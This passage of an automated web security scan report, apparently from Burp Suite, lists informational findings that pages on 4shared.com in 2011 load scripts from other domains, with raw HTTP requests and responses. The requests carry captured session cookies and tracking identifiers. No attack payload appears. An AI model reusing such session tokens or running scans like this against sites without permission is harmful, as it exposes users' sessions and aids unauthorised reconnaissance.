<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.10. http://www.4shared.com/images/void.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=38495591D688E5F4D8D920445CB59833.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:41 GMT
Content-Length: 38652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.11. http://www.4shared.com/js/'%20+%20img%20+%20'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /js/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.12. http://www.4shared.com/js/'%20+%20val%20+%20'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /js/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.13. http://www.4shared.com/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.14. http://www.4shared.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 28005
Date: Fri, 29 Jul 2011 14:01:24 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared for Symbian</title>
<meta http-equiv="Content-Ty
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.15. http://www.4shared.com/m/iphone.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/iphone.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/iphone.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/m/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23384
Date: Fri, 29 Jul 2011 14:07:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared for iPhone and iPad</title>
<meta http-equiv="Co
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div style="padding-top:2px;"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div style="padding-top:2px;"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.16. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.17. http://www.4shared.com/remindPassword.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /remindPassword.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 21381
Date: Fri, 29 Jul 2011 13:57:59 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - online file sharing and storage - Password reminder</tit
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.18. http://www.4shared.com/requestCall.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /requestCall.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /requestCall.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 22978
Date: Fri, 29 Jul 2011 13:59:28 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<title>4shared.com - free file sh
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc-TgwAAAAAALAAwEdL3ahmchYPnZI0XvSimWGm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.19. http://www.4shared.com/signup.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signup.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947872791; Domain=.4shared.com; Pa